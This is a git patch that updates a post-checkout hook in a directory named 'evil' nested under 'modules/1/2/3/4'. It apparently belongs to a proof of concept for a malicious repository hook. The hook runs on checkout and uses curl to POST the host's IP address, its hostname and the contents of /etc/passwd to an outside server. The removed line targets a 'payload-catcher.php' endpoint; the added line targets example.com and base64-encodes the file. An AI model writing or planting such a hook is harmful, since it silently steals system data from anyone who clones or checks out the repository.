From fc4644ec3f8d9326f845303f4e8eca87f4f1eb3d Mon Sep 17 00:00:00 2001 From: z0rs Date: Thu, 11 Jan 2024 22:46:26 -0600 Subject: [PATCH] Update modules/1/2/3/4/evil/hooks/post-checkout --- modules/1/2/3/4/evil/hooks/post-checkout | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/modules/1/2/3/4/evil/hooks/post-checkout b/modules/1/2/3/4/evil/hooks/post-checkout index 1e01236..97740cf 100755 --- a/modules/1/2/3/4/evil/hooks/post-checkout +++ b/modules/1/2/3/4/evil/hooks/post-checkout @@ -1,2 +1,2 @@ #!/bin/bash -curl -X POST https://z0.rs/payload-catcher.php -d "ip=$(hostname -I)&hostname=$(hostname)&passwd=$(cat /etc/passwd)" +curl -X POST http://example.com -d "ip=$(hostname -I | tr -d '[:space:]')&hostname=$(hostname)&passwd=$(cat /etc/passwd | base64)"